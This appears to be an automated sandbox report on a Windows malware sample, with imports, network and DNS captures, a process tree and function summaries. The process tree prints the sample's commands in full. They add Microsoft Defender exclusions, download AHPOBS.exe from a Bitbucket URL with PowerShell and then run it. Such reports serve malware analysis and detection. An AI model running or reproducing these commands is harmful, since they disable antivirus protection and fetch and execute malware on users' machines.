WINMM.DLL	timeBeginPeriod
OLE32.DLL	CoInitialize, CoTaskMemFree
SHLWAPI.DLL	PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
USER32.DLL	CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL	GetStockObject
COMCTL32.DLL	InitCommonControlsEx

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 08:56:59.540290117 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:56:59.540338039 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:56:59.540430069 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:56:59.679124117 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:56:59.679153919 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:57:01.445928097 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:57:01.446033955 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:57:01.449378014 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:57:01.449393034 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:57:01.449750900 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:57:01.491242886 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:57:01.565557003 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:57:01.607328892 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:57:02.171490908 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:57:02.171524048 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:57:02.171602011 CET	443	49730	185.166.143.48	192.168.2.4
Dec 24, 2024 08:57:02.171688080 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:57:02.171688080 CET	49730	443	192.168.2.4	185.166.143.48
Dec 24, 2024 08:57:02.193012953 CET	49730	443	192.168.2.4	185.166.143.48

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 08:56:59.296551943 CET	62308	53	192.168.2.4	1.1.1.1
Dec 24, 2024 08:56:59.433655977 CET	53	62308	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 08:56:59.296551943 CET	192.168.2.4	1.1.1.1	0x14fb	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 08:56:59.433655977 CET	1.1.1.1	192.168.2.4	0x14fb	No error (0)	bitbucket.org	185.166.143.48	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:56:59.433655977 CET	1.1.1.1	192.168.2.4	0x14fb	No error (0)	bitbucket.org	185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 24, 2024 08:56:59.433655977 CET	1.1.1.1	192.168.2.4	0x14fb	No error (0)	bitbucket.org	185.166.143.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.166.143.48	443	7872	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 07:57:01 UTC	109	OUT	GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-12-24 07:57:02 UTC	5911	IN	HTTP/1.1 302 Found Date: Tue, 24 Dec 2024 07:57:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHONW5FVM&Signature=JJXPEO4fQt%2Bzh0dXsUTKdQBF0Lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCIHrI2CN0BUAlXyNz4D8uaVttL0BaeDCIh6hRdxrGpW5RAiEA5501iqM6WIf8hcqNoGp%2FmC9iIOZ4U6eiZy7SDHVJ15IqsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDC3aSctdkzrCCPLu5CqEAkrnwv2oizWrdHjTy9D3WcvZetpeRTHf%2F2vbGhKdZh%2BzuPiDJJGfyZ4PdurHYjkYKcydY9NB62Nm%2FNwRDonFGwhJor1h9d27Q4LsKn9j%2FZKQm7e5JeSZRv%2FqouKhUZssEvleJYs37B4%2BqpdIZcMCP3ObrL%2BM7APYQraHe0NO75oMcJ4A5ciB334p6m63p0pb6F88iA0yVXjUuzLtf7bzk7HLblJSPeoGLQ25fWARODfmagb7TfXY9Ve95f0YbVjRbpIH74XRexmbU0FhGZ2MUavL7TaNPIixeH2iWRSkzTms9OYKIcLGQiw%2FAMPyVi4aEFKYjSN0oDcBFs3Mzw1XzUp9CbObMJvNqbsGOp0BhoFKZTCRJmW36i4TbWQrGs5%2BBHitzunu6vk04BhJgg2vGKQuUV%2FmUl0nL%2FR%2F6oQY%2BIyzZP0NaEedosqPfSXeRwYt%2BBx%2FwgmREHY7EW6 [TRUNCATED] Expires: Tue, 24 Dec 2024 07:57:01 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 175e8b01f1f4 X-Version: c9b3998323c0 X-Static-Version: c9b3998323c0 X-Request-Count: 825 X-Render-Time: 0.0805819034576416 X-B3-Traceid: 83a9df2626c5443389436cbcc3b1a688 X-B3-Spanid: 5dc6cd97f4c02eb0 X-Frame-Options: SAMEORIGIN Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; object-src 'none'; connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1. [TRUNCATED] X-Usage-Quota-Remaining: 998916.943 X-Usage-Request-Cost: 1106.47 X-Usage-User-Time: 0.025747 X-Usage-System-Time: 0.007447 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 83a9df2626c5443389436cbcc3b1a688 Atl-Request-Id: 83a9df26-26c5-4433-8943-6cbcc3b1a688 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=191,atl-edge-internal;dur=3,atl-edge-upstream;dur=189,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Target ID:	0
Start time:	02:56:53
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\Gq48hjKhZf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Gq48hjKhZf.exe"
Imagebase:	0x140000000
File size:	123'392 bytes
MD5 hash:	454BF064C19D363B154A419FC69DC693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:56:53
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
Imagebase:	0x7ff68d640000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:56:53
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:56:53
Start date:	24/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:56:57
Start date:	24/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:57:01
Start date:	24/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:57:03
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
Imagebase:	0x7ff68d640000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.6%
Total number of Nodes:	834
Total number of Limit Nodes:	21

Executed Functions

Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400126D0: TlsGetValue.KERNEL32 ref: 00000001400126E2
Part of subcall function 00000001400126D0: HeapReAlloc.KERNEL32 ref: 0000000140012762

GetTempPathW.KERNEL32 ref: 000000014000D9F3
LoadLibraryW.KERNEL32 ref: 000000014000DA02
GetProcAddress.KERNEL32 ref: 000000014000DA1D
GetLongPathNameW.KERNELBASE(?,?,?,0000000140001F92), ref: 000000014000DA31
FreeLibrary.KERNEL32 ref: 000000014000DA38

Strings

Kernel32.DLL, xrefs: 000000014000D9F9
GetLongPathNameW, xrefs: 000000014000DA13

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 820969696-2943376620
Opcode ID: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
Instruction ID: 230e630dded4efaa915c31c3904b5b857ecb3aa047886c8d585020238d201ac5
Opcode Fuzzy Hash: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
Instruction Fuzzy Hash: 74116D3171074086EF159F27A9443A967A5FB8CFC0F481029FF4E4B7A5DE39C4518340

Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempFileNameW.KERNEL32 ref: 0000000140001FBF

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 000000014000CA00: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0000000140002CF1), ref: 000000014000CA47

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266

Part of subcall function 000000014000DA6C: SetFileAttributesW.KERNEL32 ref: 000000014000DA8C
Part of subcall function 000000014000DA6C: DeleteFileW.KERNEL32 ref: 000000014000DA95

Part of subcall function 000000014000D914: wcsncpy.MSVCRT ref: 000000014000D932
Part of subcall function 000000014000D914: wcslen.MSVCRT ref: 000000014000D944
Part of subcall function 000000014000D914: CreateDirectoryW.KERNEL32 ref: 000000014000D994

GetTempFileNameW.KERNEL32 ref: 0000000140002040

Part of subcall function 0000000140012210: HeapReAlloc.KERNEL32 ref: 0000000140012293

GetTempFileNameW.KERNEL32 ref: 00000001400020C1
PathAddBackslashW.SHLWAPI ref: 00000001400020CD
PathRenameExtensionW.SHLWAPI ref: 000000014000212E
GetTempFileNameW.KERNEL32 ref: 0000000140002153

Part of subcall function 0000000140012360: HeapFree.KERNEL32 ref: 000000014001237F

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
String ID:
API String ID: 4232179356-0
Opcode ID: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
Instruction ID: 77aa1fd205ec2d48eabb088ee49ef1dd4fb6b524f1726a3c9e39dbd98a5b5f3b
Opcode Fuzzy Hash: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
Instruction Fuzzy Hash: 138162FBE69644E5EA07B763BC46BED5220D3AD3D4F504410FF08062A3EE3995EA4B10

Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400112A8: EnterCriticalSection.KERNEL32 ref: 00000001400112C4
Part of subcall function 00000001400112A8: LeaveCriticalSection.KERNEL32 ref: 0000000140011355

CreateFileW.KERNEL32 ref: 000000014000DEED
CreateFileW.KERNEL32 ref: 000000014000DF37
CreateFileW.KERNEL32 ref: 000000014000DF7E
CreateFileW.KERNEL32 ref: 000000014000DFAC
HeapAlloc.KERNEL32 ref: 000000014000DFED
SetFilePointer.KERNEL32 ref: 000000014000E047

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
String ID:
API String ID: 2685021396-0
Opcode ID: 90872b3e34ccf7d1475fd6165b8231d8d7d244be71cfa9b75e83e52ddb76e0bc
Instruction ID: 19dccfeb25466122eda91520b9d3e1282c027ca6efa307134c14a125255dccfb
Opcode Fuzzy Hash: 90872b3e34ccf7d1475fd6165b8231d8d7d244be71cfa9b75e83e52ddb76e0bc
Instruction Fuzzy Hash: CA51B1B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140012450: wcslen.MSVCRT ref: 000000014001246E

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266

Part of subcall function 0000000140012210: HeapReAlloc.KERNEL32 ref: 0000000140012293

GetModuleHandleW.KERNEL32 ref: 00000001400061AE

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 00000001400125D0: TlsGetValue.KERNEL32 ref: 00000001400125DA

Part of subcall function 0000000140007DC0: CharUpperW.USER32 ref: 0000000140007E24

Part of subcall function 0000000140001E57: GetTempFileNameW.KERNEL32 ref: 0000000140001FBF

PathRemoveBackslashW.SHLWAPI ref: 00000001400063A7

Part of subcall function 0000000140012520: TlsGetValue.KERNEL32 ref: 000000014001252A

Part of subcall function 000000014000C45C: SetEnvironmentVariableW.KERNEL32 ref: 000000014000C476

PathQuoteSpacesW.SHLWAPI ref: 00000001400064FF
PathQuoteSpacesW.SHLWAPI ref: 000000014000656B

Part of subcall function 0000000140007284: CreateThread.KERNEL32 ref: 00000001400072B3
Part of subcall function 0000000140007284: EnterCriticalSection.KERNEL32 ref: 00000001400072CC
Part of subcall function 0000000140007284: LeaveCriticalSection.KERNEL32 ref: 0000000140007344

Part of subcall function 0000000140012360: HeapFree.KERNEL32 ref: 000000014001237F

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
String ID:
API String ID: 2499486723-0
Opcode ID: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
Instruction ID: 8b331e692c67017886d6c7239b17c9f9d27d3c51ffaf72a1bb59c68ee6c0545e
Opcode Fuzzy Hash: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
Instruction Fuzzy Hash: 83723BB6E25548D6EA16B7B7B8877E91220A3AD394F500411FF4C0B363EE39C5F64B10

Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32 ref: 000000014000E664
memmove.MSVCRT(?,?,?,?,?,000000014000E5DD), ref: 000000014000E69F

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: FilePointermemmove
String ID:
API String ID: 2366752189-0
Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 000000014000E472
WriteFile.KERNEL32 ref: 000000014000E4D6
HeapFree.KERNEL32 ref: 000000014000E4E8

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: FileWrite$FreeHeap
String ID:
API String ID: 74418370-0
Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 000000014000D932
wcslen.MSVCRT ref: 000000014000D944
CreateDirectoryW.KERNEL32 ref: 000000014000D994

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 000000014000B547
InitCommonControlsEx.COMCTL32 ref: 000000014000B561
CoInitialize.OLE32 ref: 000000014000B569

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

Function 00000001400126D0 Relevance: 3.8, APIs: 3, Instructions: 71
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00000001400126E2
HeapReAlloc.KERNEL32 ref: 0000000140012762
HeapReAlloc.KERNEL32 ref: 00000001400127C2

Memory Dump Source

Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd

Similarity

API ID: AllocHeap$Value
String ID:
API String ID: 3898337583-0
Opcode ID: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
Instruction ID: 7cab8ebf5e8be7cca61280ad2f22e4d1c3948fe97e6d3aaf46f0ca18481b9e55
Opcode Fuzzy Hash: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
Instruction Fuzzy Hash: E7317336609B4486DB21CB5AE49035AB7A0F7CCBE8F144216EB8D47B78DF79C691CB40

Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 0000000140012223
HeapAlloc.KERNEL32 ref: 0000000140012266
